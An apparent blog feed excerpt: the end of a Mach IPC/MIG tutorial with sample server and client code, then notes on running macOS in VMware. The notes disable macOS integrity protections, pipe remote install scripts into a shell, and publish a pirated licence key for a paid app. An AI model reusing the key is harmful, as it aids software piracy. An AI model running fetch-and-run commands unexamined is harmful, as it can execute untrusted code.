class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach_types.defs&gt;</span> </span></span><br><span class="line"></span><br><span class="line">type <span class="type">input_string_t</span> = array[<span class="number">64</span>] of <span class="type">char</span>; </span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * This part needs a little explanation</span></span><br><span class="line"><span class="comment"> * First, xput_number_t is declared as an int</span></span><br><span class="line"><span class="comment"> * InTran: when an int is passed in and has to be converted to xput_number_t, misc_translate_int_to_xput_number_t is called to convert it</span></span><br><span class="line"><span class="comment"> * OutTran: when an int has to be output and must be converted from xput_number_t, misc_translate_xput_number_t_to_int is called to convert it</span></span><br><span class="line"><span class="comment"> * Destructor: the function to run when a value of type xput_number_t has to be destroyed</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line">type <span class="type">xput_number_t</span>  = <span class="type">int</span> </span><br><span class="line">         CType      : <span class="type">int</span> </span><br><span class="line">         InTran     : <span class="type">xput_number_t</span> <span class="built_in">misc_translate_int_to_xput_number_t</span>(<span class="type">int</span>) </span><br><span class="line">         OutTran    : <span class="type">int</span> <span class="built_in">misc_translate_xput_number_t_to_int</span>(<span class="type">xput_number_t</span>) </span><br><span class="line">         Destructor : <span class="built_in">misc_remove_reference</span>(<span class="type">xput_number_t</span>) </span><br><span class="line">    ; </span><br><span class="line"> </span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * Import declarations </span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line"><span class="keyword">import</span> <span class="string">&quot;misc_types.h&quot;</span>; </span><br><span class="line"> </span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * Operation descriptions </span></span><br><span class="line"><span class="comment"> * Note that every routine declaration must contain at least one parameter of type mach_port_t.</span></span><br><span class="line"><span class="comment"> * On the Client side, this parameter selects which Server the call is sent to</span></span><br><span class="line"><span class="comment"> * On the Server side, the implementation of the routine also receives a mach_port_t value, which it can use to tell which port the request arrived on</span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line"> </span><br><span class="line"><span class="comment">/* This should be operation #500 */</span> </span><br><span class="line"><span class="function">routine <span class="title">string_length</span><span 
class="params">( </span></span></span><br><span class="line"><span class="params"><span class="function">                         server_port : <span class="type">mach_port_t</span>; </span></span></span><br><span class="line"><span class="params"><span class="function">                      in instring    : <span class="type">input_string_t</span>; </span></span></span><br><span class="line"><span class="params"><span class="function">                     out len         : <span class="type">xput_number_t</span>)</span></span>; </span><br><span class="line"><span class="comment">/* Create some holes in operation sequence */</span> </span><br><span class="line"><span class="comment">// Skip IDs 501, 502 and 503 in the sequence; Skip keeps the interface numbering compatible, somewhat like protobuf</span></span><br><span class="line">Skip; </span><br><span class="line">Skip; </span><br><span class="line">Skip; </span><br><span class="line"> </span><br><span class="line"><span class="comment">/* This should be operation #504, as there are three Skip&#x27;s */</span> </span><br><span class="line"><span class="function">routine <span class="title">factorial</span><span class="params">( </span></span></span><br><span class="line"><span class="params"><span class="function">                     server_port : <span class="type">mach_port_t</span>; </span></span></span><br><span class="line"><span class="params"><span class="function">                  in num         : <span class="type">xput_number_t</span>; </span></span></span><br><span class="line"><span class="params"><span class="function">                 out fac         : <span class="type">xput_number_t</span>)</span></span>; </span><br><span class="line"> </span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * Option declarations </span></span><br><span class="line"><span class="comment"> * Two prefixes are set here; they are used as name prefixes for the IPC functions that are called / implemented, respectively</span></span><br><span class="line"><span class="comment"> */</span> 
</span><br><span class="line">ServerPrefix Server_; </span><br><span class="line">UserPrefix   Client_; </span><br></pre></td></tr></table></figure><p>For more on MIG defs syntax, see <a href="https://www.nextop.de/NeXTstep_3.3_Developer_Documentation/OperatingSystem/Part1_Mach/02_Messages/Messages.htmld/index.html">Using Mach Messages - NeXTstep 3.3 Developer Documentation</a>.</p><h4 id="d-Server">d. Server</h4><p>Server source:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span 
class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// server.c </span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;misc_types.h&quot;</span> </span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">extern</span> <span class="type">boolean_t</span> <span class="title">misc_server</span><span class="params">(<span class="type">mach_msg_header_t</span> *inhdr, </span></span></span><br><span class="line"><span class="params"><span class="function">                             <span class="type">mach_msg_header_t</span> *outhdr)</span></span>; </span><br><span class="line"></span><br><span class="line"><span class="comment">// InTran </span></span><br><span class="line"><span class="function"><span class="type">xput_number_t</span> </span></span><br><span class="line"><span class="function"><span class="title">misc_translate_int_to_xput_number_t</span><span class="params">(<span 
class="type">int</span> param)</span> </span>&#123; </span><br><span class="line">     <span class="built_in">printf</span>(<span class="string">&quot;misc_translate_incoming(%d)\n&quot;</span>, param); </span><br><span class="line">     <span class="keyword">return</span> (<span class="type">xput_number_t</span>)param; </span><br><span class="line">&#125; </span><br><span class="line"> </span><br><span class="line"><span class="comment">// OutTran </span></span><br><span class="line"><span class="function"><span class="type">int</span> </span></span><br><span class="line"><span class="function"><span class="title">misc_translate_xput_number_t_to_int</span><span class="params">(<span class="type">xput_number_t</span> param)</span> </span>&#123; </span><br><span class="line">     <span class="built_in">printf</span>(<span class="string">&quot;misc_translate_outgoing(%d)\n&quot;</span>, (<span class="type">int</span>)param); </span><br><span class="line">     <span class="keyword">return</span> (<span class="type">int</span>)param; </span><br><span class="line">&#125; </span><br><span class="line"> </span><br><span class="line"><span class="comment">// Destructor </span></span><br><span class="line"><span class="function"><span class="type">void</span> </span></span><br><span class="line"><span class="function"><span class="title">misc_remove_reference</span><span class="params">(<span class="type">xput_number_t</span> param)</span> </span>&#123; </span><br><span class="line">     <span class="built_in">printf</span>(<span class="string">&quot;misc_remove_reference(%d)\n&quot;</span>, (<span class="type">int</span>)param); </span><br><span class="line">&#125; </span><br><span class="line"> </span><br><span class="line"><span class="comment">// an operation that we export </span></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> </span></span><br><span class="line"><span class="function"><span 
class="title">string_length</span><span class="params">(<span class="type">mach_port_t</span>     server_port, </span></span></span><br><span class="line"><span class="params"><span class="function">              <span class="type">input_string_t</span>  instring, </span></span></span><br><span class="line"><span class="params"><span class="function">              <span class="type">xput_number_t</span>  *len)</span> </span></span><br><span class="line"><span class="function"></span>&#123; </span><br><span class="line">    <span class="keyword">if</span> (!instring || !len) </span><br><span class="line">        <span class="keyword">return</span> KERN_INVALID_ADDRESS; </span><br><span class="line"> </span><br><span class="line">    *len = <span class="built_in">strlen</span>(instring);</span><br><span class="line"> </span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS; </span><br><span class="line">&#125; </span><br><span class="line"> </span><br><span class="line"><span class="comment">// an operation that we export </span></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> </span></span><br><span class="line"><span class="function"><span class="title">factorial</span><span class="params">(<span class="type">mach_port_t</span> server_port, <span class="type">xput_number_t</span> num, <span class="type">xput_number_t</span> *fac)</span> </span>&#123; </span><br><span class="line">    <span class="keyword">if</span> (!fac) </span><br><span class="line">        <span class="keyword">return</span> KERN_INVALID_ADDRESS; </span><br><span class="line"> </span><br><span class="line">    *fac = <span class="number">1</span>; </span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">2</span>; i &lt;= num; i++) </span><br><span class="line">        *fac *= i; </span><br><span class="line"> </span><br><span class="line">    <span 
class="keyword">return</span> KERN_SUCCESS; </span><br><span class="line">&#125; </span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">void</span>)</span> </span>&#123; </span><br><span class="line">    <span class="type">kern_return_t</span> kr; </span><br><span class="line">    <span class="type">mach_port_t</span> server_port = MACH_PORT_NULL; <span class="comment">// initialized so the failure path below never reads an indeterminate value</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ((kr = <span class="built_in">bootstrap_check_in</span>(bootstrap_port, MIG_MISC_SERVICE, </span><br><span class="line">                                 &amp;server_port)) != BOOTSTRAP_SUCCESS) &#123; </span><br><span class="line">        <span class="built_in">mach_port_deallocate</span>(<span class="built_in">mach_task_self</span>(), server_port); </span><br><span class="line">        <span class="built_in">mach_error</span>(<span class="string">&quot;bootstrap_check_in:&quot;</span>, kr); </span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">1</span>); </span><br><span class="line">    &#125; </span><br><span class="line">    </span><br><span class="line">    <span class="built_in">mach_msg_server</span>(misc_server,            <span class="comment">// call the server-interface module </span></span><br><span class="line">                    <span class="built_in">sizeof</span>(<span class="type">msg_misc_t</span>),     <span class="comment">// maximum receive size </span></span><br><span class="line">                    server_port,            <span class="comment">// port to receive on </span></span><br><span class="line">                    MACH_MSG_TIMEOUT_NONE); <span class="comment">// options </span></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>; </span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><p>The server has a bit more work to do:</p><ol><li><p>At startup, the server registers its server port with bootstrap.</p><p>In addition, the server calls <code>mach_msg_server</code>, which keeps the current process looping to handle Mach messages.</p><p>The first argument of mach_msg_server is the MIG-generated <code>misc_server</code> handler routine, which dispatches each incoming Mach message to the corresponding interface.</p></li><li><p><strong>The server provides the concrete implementations of the two interfaces</strong>. When the server receives a message from the client, these two functions are called from miscServer.c.</p></li><li><p>Beyond that, the server also implements the other functions that the MIG-generated code calls.</p></li></ol><h4 id="e-Client">e. Client</h4><p>Client source:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// client.c </span></span><br><span class="line"> </span><br><span class="line"><span class="meta">#<span class="keyword">include</span> 
<span class="string">&quot;misc_types.h&quot;</span> </span></span><br><span class="line"> </span><br><span class="line"><span class="meta">#<span class="keyword">define</span> INPUT_STRING <span class="string">&quot;Hello, MIG!&quot;</span> </span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> INPUT_NUMBER 5 </span></span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="type">int</span> </span></span><br><span class="line"><span class="function"><span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv)</span> </span></span><br><span class="line"><span class="function"></span>&#123; </span><br><span class="line">    <span class="type">kern_return_t</span> kr; </span><br><span class="line">    <span class="type">mach_port_t</span>   server_port; </span><br><span class="line">    <span class="type">int</span>           len, fac; </span><br><span class="line"> </span><br><span class="line">    <span class="comment">// look up the service to find the server&#x27;s port </span></span><br><span class="line">    <span class="keyword">if</span> ((kr = <span class="built_in">bootstrap_look_up</span>(bootstrap_port, MIG_MISC_SERVICE, </span><br><span class="line">                                &amp;server_port)) != BOOTSTRAP_SUCCESS) &#123; </span><br><span class="line">        <span class="built_in">mach_error</span>(<span class="string">&quot;bootstrap_look_up:&quot;</span>, kr); </span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">1</span>); </span><br><span class="line">    &#125; </span><br><span class="line"> </span><br><span class="line">    <span class="comment">// call a procedure </span></span><br><span class="line">    <span class="keyword">if</span> ((kr = <span class="built_in">string_length</span>(server_port, INPUT_STRING, &amp;len)) != KERN_SUCCESS) </span><br><span 
class="line">        <span class="built_in">mach_error</span>(<span class="string">&quot;string_length:&quot;</span>, kr); </span><br><span class="line">    <span class="keyword">else</span> </span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;length of \&quot;%s\&quot; is %d\n&quot;</span>, INPUT_STRING, len); </span><br><span class="line"> </span><br><span class="line">    <span class="comment">// call another procedure </span></span><br><span class="line">    <span class="keyword">if</span> ((kr = <span class="built_in">factorial</span>(server_port, INPUT_NUMBER, &amp;fac)) != KERN_SUCCESS) </span><br><span class="line">        <span class="built_in">mach_error</span>(<span class="string">&quot;factorial:&quot;</span>, kr); </span><br><span class="line">    <span class="keyword">else</span> </span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;factorial of %d is %d\n&quot;</span>, INPUT_NUMBER, fac); </span><br><span class="line"> </span><br><span class="line">    <span class="built_in">mach_port_deallocate</span>(<span class="built_in">mach_task_self</span>(), server_port); </span><br><span class="line"> </span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>); </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The client source is short and does only two things:</p><ol><li><p>Look up the server port that the server registered with bootstrap</p></li><li><p>Call <code>string_length</code> and <code>factorial</code> on the server port. Note that the first parameter of both functions is of type <code>mach_port_t</code>, and that their implementations live in <code>miscUser.c</code></p><blockquote><p>Why are these two functions implemented in miscUser.c rather than server.c?</p><p>Because, from the client's point of view, the real implementations are not the client's concern: the two same-named functions in miscUser.c ultimately perform Mach IPC to send the request to the server.</p></blockquote></li></ol><h4 id="f-编译与运行">f. Build and Run</h4><p>Build and run with the following commands:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Terminal 1</span></span><br><span class="line">mig -v misc.defs </span><br><span class="line">gcc -Wall -g -o server server.c miscServer.c </span><br><span class="line">gcc -Wall -g -o client client.c miscUser.c </span><br><span class="line">./server</span><br><span class="line"></span><br><span class="line"><span class="comment"># Terminal 2</span></span><br><span class="line">./client</span><br></pre></td></tr></table></figure><p>This diagram shows how all the source files relate:</p><p><img src="/2021/12/mach_ipc_intro/image-20220106000421902.png" alt="image-20220106000421902"></p><p>Output:</p><p><img src="/2021/12/mach_ipc_intro/image-20220105234905893.png" alt="image-20220105234905893"></p><p>This is the relationship between the client and the server:</p><p><img src="/2021/12/mach_ipc_intro/image-20220106000500793.png" alt="image-20220106000500793"></p><h2 id="九、参考">9. References</h2><ul><li>*OS Internals, Vol. 1 and Vol. 2</li><li><a href="https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html">Mach ports - darling</a></li><li>dmcyk blog<ul><li><a href="https://dmcyk.xyz/post/xnu_ipc_i_mach_messages/">XNU IPC - Mach Message</a></li><li><a href="https://dmcyk.xyz/post/xnu_ipc_ii_message_apis/xnu_ipc_ii_message_apis/">XNU IPC - bidirectional Mach messages</a></li><li><a href="https://dmcyk.xyz/post/xnu_ipc_iii_ool_data/">XNU IPC - Introduction to OOL data</a></li></ul></li><li><a href="https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/KernelProgramming/Mach/Mach.html">Mach - Apple archive dev documentation</a></li><li><a href="http://web.mit.edu/darwin/src/modules/xnu/osfmk/man/">XNU man: Mach IPC Interface - 
mit</a></li><li><a href="https://web.mit.edu/darwin/src/modules/xnu/osfmk/man/mach_msg.html">mach_msg - mit</a></li><li><a href="https://www.gnu.org/software/hurd/gnumach-doc/Message-Format.html">4.2.2 Message Format - GNUMach-doc</a></li><li><a href="https://www.nextop.de/NeXTstep_3.3_Developer_Documentation/OperatingSystem/Part1_Mach/02_Messages/Messages.htmld/index.html">Using Mach Messages - NeXTstep 3.3 Developer Documentation</a></li></ul>]]></content>
    
    
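    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;1. Introduction&lt;/h2&gt;
&lt;p&gt;Mach is a &lt;strong&gt;communication-oriented&lt;/strong&gt; operating system &lt;strong&gt;microkernel&lt;/strong&gt; whose basic unit of work is the &lt;code&gt;task&lt;/code&gt; (rather than the process). The Mach kernel provides an IPC mechanism, and most XNU services are built on top of Mach IPC and Mach tasks.&lt;/p&gt;
&lt;p&gt;Mach defines several fundamental abstractions, among them &lt;code&gt;task&lt;/code&gt;, &lt;code&gt;thread&lt;/code&gt;, &lt;code&gt;port&lt;/code&gt;, &lt;code&gt;message&lt;/code&gt;, and &lt;code&gt;memory object&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;As a component of the macOS XNU kernel, the Mach microkernel takes over a significant share of its functionality, the best known of which is the Mach IPC inter-process communication mechanism.&lt;/p&gt;
&lt;p&gt;Here I briefly document some of the inner workings of Mach IPC.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Note that this is my first time working with Mach IPC, so some of the statements or explanations here may be wrong; corrections are very welcome.&lt;/p&gt;
&lt;/blockquote&gt;</summary>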
    
    
    
    
    <category term="mac" scheme="https://kiprey.github.io/tags/mac/"/>
    
    <category term="mach" scheme="https://kiprey.github.io/tags/mach/"/>
    
    <category term="ipc" scheme="https://kiprey.github.io/tags/ipc/"/>
    
  </entry>
  
  <entry>
    <title>Notes on Installing macOS in VMware Workstation 16 on Win10</title>
    <link href="https://kiprey.github.io/2021/12/vmware_macos/"/>
    <id>https://kiprey.github.io/2021/12/vmware_macos/</id>
    <published>2021-12-12T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.211Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">1. Introduction</h2><p>These are the pitfalls I ran into while setting up a macOS virtual machine in VMware Workstation on Win10.</p><span id="more"></span><h2 id="二、MacOS-安装">2. Installing macOS</h2><ul><li><p>First, download the patch that unlocks the macOS option in VMware.</p><blockquote><p>Personally, I don't find the phrase “unlocking macOS” very direct.</p><p>What the patch actually does is <strong>make VMware additionally support macOS</strong>.</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> git@github.com:BDisp/unlocker.git</span><br></pre></td></tr></table></figure><p>Next, open Task Manager and <strong>force-quit every process whose name starts with VMware</strong> so that the patch does not fail:</p><p><img src="/2021/12/vmware_macos/image-20211213105750235.png" alt="image-20211213105750235"></p><p>Then <strong>run as administrator</strong>: <code>win-install.cmd</code>. While running, the script downloads some files from the VMware website, so how long it takes depends on your network.</p><p>Once it finishes, <strong>reboot the computer</strong>, or manually start the <strong>VMware NAT Service</strong> and <strong>VMware VMnet DHCP service</strong> under <strong>Services</strong>; otherwise <strong>the virtual machine will have no network access</strong>.</p><blockquote><p>Pitfall: I forgot to restart the network services…</p></blockquote></li><li><p>Next, create a new virtual machine in VMware and set the disc image to the downloaded ISO/CDR file:</p><p><img src="/2021/12/vmware_macos/image-20211213111248818.png" alt="image-20211213111248818"></p><p>Then choose <code>Apple Mac OS X</code> and click Next all the way through. I recommend allocating <strong>at least 70GB</strong> of disk space.</p><blockquote><p>If VMware does not offer this option at this point, the patch was not installed successfully and you need to reinstall its latest version.</p></blockquote><p><img src="/2021/12/vmware_macos/image-20211213111314996.png" alt="image-20211213111314996"></p></li><li><p>After the virtual machine is created, boot it. In <strong>Disk Utility</strong>:</p><p><img src="/2021/12/vmware_macos/image-20211213112904276.png" alt="image-20211213112904276"></p><p>erase (format) the VMware disk; otherwise the macOS installer will not be able to access it:</p><p><img src="/2021/12/vmware_macos/image-20211213113011006.png" alt="image-20211213113011006"></p><p>When erasing, just give the disk a new name and leave everything else unchanged:</p><p><img src="/2021/12/vmware_macos/image-20211213113058440.png" alt="image-20211213113058440"></p><p>After formatting the disk, open <strong>Utilities-&gt;Terminal</strong> from the top menu:</p><p><img 
src="/2021/12/vmware_macos/image-20211213113304952.png" alt="image-20211213113304952"></p><p>键入 <code>csrutil disable</code> 禁用系统完整性保护：</p><blockquote><p>因为系统完整性保护会限制 root 权限的行为。</p></blockquote><p><img src="/2021/12/vmware_macos/image-20211213113443227.png" alt="image-20211213113443227"></p><p>之后键入 <code>csrutil authenticated-root disable</code> 以关闭 Authenticated-root 保护。该保护会使得 MacOS 在引导期间，将一个被加密签名后的<strong>只读根文件系统快照挂载进根目录</strong>，因此我们需要禁用它以便于修改根路径或系统路径下的文件等。</p><blockquote><p>如果还是不行，则在 MacOS 安装完成后，执行 <code>sudo mount -uw /</code> 试试，注意该指令只在本次开机时有效，下次开机需要重新设置。</p></blockquote><p>接下来照常安装 MacOS 即可。</p></li><li><p>MacOS 安装完成后。<strong>不要马上启动！不要马上启动！不要马上启动！</strong></p><p>要先在该 MacOS 的 vmx 文件末尾追加 <code>smc.version = 0</code>，防止虚拟机出现错误。</p><p>追加完成后再启动。</p></li><li><p>启动新安装的 MacOS，之后一定要<strong>立即升级当前安装的 MacOS 系统</strong>（12GB左右）。因为 Apple 对远古版本的 MacOS 支持性非常低，就连安装软件都会有限制。</p><p>一定要在完成 MacOS 系统升级后，再去装各类软件以及 IDE 等等。</p><p>最好先安装当前远古版本 MacOS 系统的一些补丁，再去升级 MacOS 系统，不然可能有一定概率会升级失败。</p><blockquote><p>我这边更新到的版本是  <code>macOS Monterey 12.0.1</code>。</p></blockquote></li></ul><h2 id="三、安装各类软件">三、安装各类软件</h2><ol><li><p>vmtools。右键虚拟机并点击 <strong>安装 Vmware Tools</strong>，然后根据步骤一步步来就好。</p><p><img src="/2021/12/vmware_macos/image-20211213120226602.png" alt="image-20211213120226602"></p></li><li><p>AppStore 上安装</p><ol><li>DevCleaner for xcode：释放 Xcode 缓存文件。</li><li>xcode（12GB左右）。不用多说。</li><li>超级右键。扩展一下自己的右键菜单，使得支持<strong>右键打开终端操作</strong>。</li></ol></li><li><p>下载 <a href="https://bjango.com/mac/istatmenus/">iStat Menus6</a>。这是 MacOS 上的一个系统监测软件，需要付费，可用序列号如下：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Email: 982092332@qq.com</span><br><span class="line">SN: GAWAE-FCWQ3-P8NYB-C7GF7-NEDRT-Q5DTB-MFZG6-6NEQC-CRMUD-8MZ2K-66SRB-SU8EW-EDLZ9-TGH3S-8SGA</span><br><span class="line"></span><br><span 
class="line">ref: http://www.pc6.com/mac/111587.html</span><br></pre></td></tr></table></figure></li><li><p>Install the Homebrew package manager</p><blockquote><p>Installing Homebrew asks for your password <strong>several times</strong>, so don't walk away.</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Install Homebrew</span></span><br><span class="line">/bin/bash -c <span class="string">&quot;<span class="subst">$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)</span>&quot;</span></span><br><span class="line"><span class="comment"># Switch to a China-based brew mirror</span></span><br><span class="line"><span class="built_in">cd</span> <span class="string">&quot;<span class="subst">$(brew --repo)</span>&quot;</span></span><br><span class="line">git remote set-url origin https://mirrors.aliyun.com/homebrew/brew.git</span><br><span class="line">git remote get-url origin</span><br></pre></td></tr></table></figure><blockquote><p>If brew misbehaves after installation and cannot find any packages, try running <code>brew doctor</code> for suggested fixes.</p></blockquote></li><li><p>Set up the <strong>Ziranma</strong> Shuangpin (double pinyin) layout. Go to <strong>Settings-&gt;Keyboard-&gt;Input Sources</strong>, select <strong>Shuangpin - Simplified</strong>, and run the following command in a terminal to enable the <strong>Ziranma</strong> layout:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">defaults write com.apple.inputmethod.CoreChineseEngineFramework shuangpinLayout 5</span><br></pre></td></tr></table></figure></li><li><p>Install <a href="https://code.visualstudio.com/docs/?dv=osx">VSCode for macOS</a>. After downloading, drag it into the <strong>Applications folder</strong>.</p></li><li><p>Install proxychains</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td 
class="code"><pre><span class="line">brew install proxychains-ng</span><br><span class="line">nano /usr/local/etc/proxychains.conf</span><br><span class="line">proxychains4 curl -v google.com </span><br></pre></td></tr></table></figure></li><li><p>Configure git.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen</span><br><span class="line"><span class="built_in">cat</span> ~/.ssh/id_rsa.pub <span class="comment"># print the public key</span></span><br><span class="line"><span class="comment"># upload the public key to GitHub</span></span><br><span class="line">git config --global user.name Kiprey</span><br><span class="line">git config --global user.email Kiprey@qq.com</span><br></pre></td></tr></table></figure></li><li><p>Install ohmyzsh.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">brew install wget</span><br><span class="line">sh -c <span class="string">&quot;<span class="subst">$(wget -O- https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)</span>&quot;</span></span><br></pre></td></tr></table></figure><p>Then install some commonly used plugins</p><ul><li><p>autojump</p><p>Download it with the following commands:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://github.com/joelthelion/autojump.git</span><br><span class="line"><span class="built_in">cd</span> autojump</span><br><span class="line">./install.py</span><br></pre></td></tr></table></figure><p>Then run <code>nano ~/.zshrc</code> and append the following to the end of the file:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[[ -s /Users/kiprey/.autojump/etc/profile.d/autojump.sh ]] &amp;&amp; <span class="built_in">source</span> /Users/kiprey/.autojump/etc/profile.d/autojump.sh</span><br><span class="line"><span class="built_in">autoload</span> -U compinit &amp;&amp; compinit -u</span><br></pre></td></tr></table></figure><p>Then add <code>autojump</code> to the plugins field in <code>.zshrc</code>:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Which plugins would you like to load?</span></span><br><span class="line"><span class="comment"># Standard plugins can be found in $ZSH/plugins/</span></span><br><span class="line"><span class="comment"># Custom plugins may be added to $ZSH_CUSTOM/plugins/</span></span><br><span class="line"><span class="comment"># Example format: plugins=(rails git textmate ruby lighthouse)</span></span><br><span class="line"><span class="comment"># Add wisely, as too many plugins slow down shell startup.</span></span><br><span class="line">plugins=(git autojump)</span><br></pre></td></tr></table></figure></li><li><p>zsh-autosuggestions and zsh-syntax-highlighting</p><p>Download:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://github.com/zsh-users/zsh-autosuggestions <span class="variable">$ZSH_CUSTOM</span>/plugins/zsh-autosuggestions</span><br><span class="line">git <span class="built_in">clone</span> https://github.com/zsh-users/zsh-syntax-highlighting <span 
